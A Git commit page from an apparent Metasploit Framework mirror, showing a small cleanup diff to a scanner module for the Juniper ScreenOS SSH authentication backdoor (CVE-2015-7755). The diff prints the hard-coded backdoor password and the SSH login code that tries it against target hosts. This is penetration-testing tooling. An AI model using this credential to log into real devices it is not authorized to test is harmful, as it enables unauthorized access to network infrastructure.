infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #6741, juniper_backdoor fixes

bug/bundler_fix
William Vu 2016-04-01 13:55:21 -05:00
parent 210cc8501c 41b802a8a2
commit f3627b9b42
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 9 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/auxiliary/scanner/ssh/juniper_backdoor.rb
View File

@ -3,9 +3,10 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'net/ssh'
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
require 'net/ssh'
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -13,17 +14,17 @@ class MetasploitModule < Msf::Auxiliary
super(update_info(info, super(update_info(info,
'Name' => 'Juniper SSH Backdoor Scanner', 'Name' => 'Juniper SSH Backdoor Scanner',
'Description' => %q{ 'Description' => %q{
This module scans for the Juniper SSH backdoor. Also valid on telnet. This module scans for the Juniper SSH backdoor (also valid on Telnet).
A username is required, and hte password is <<< %s(un='%s') = %u Any username is required, and the password is <<< %s(un='%s') = %u.
}, },
'Author' => [ 'Author' => [
'hdm', # discovery 'hdm', # Discovery
'h00die <mike@stcyrsecurity.com>' # Module 'h00die <mike[at]stcyrsecurity.com>' # Module
], ],
'References' => [ 'References' => [
['CVE', '2015-7755'], ['CVE', '2015-7755'],
['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor'], ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor'],
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713&cat=SIRT_1&actp=LIST'] ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']
], ],
'DisclosureDate' => 'Dec 20 2015', 'DisclosureDate' => 'Dec 20 2015',
'License' => MSF_LICENSE 'License' => MSF_LICENSE
@ -43,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
ssh_opts = { ssh_opts = {
port: rport, port: rport,
auth_methods: ['password', 'keyboard-interactive'], auth_methods: ['password', 'keyboard-interactive'],
password: '<<< %s(un=\'%s\') = %u' password: %q{<<< %s(un='%s') = %u}
} }
ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
@ -62,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
end end
if ssh if ssh
print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un=\'%s\') = %u") print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u")
report_vuln( report_vuln(
:host => ip, :host => ip,
:name => self.name, :name => self.name,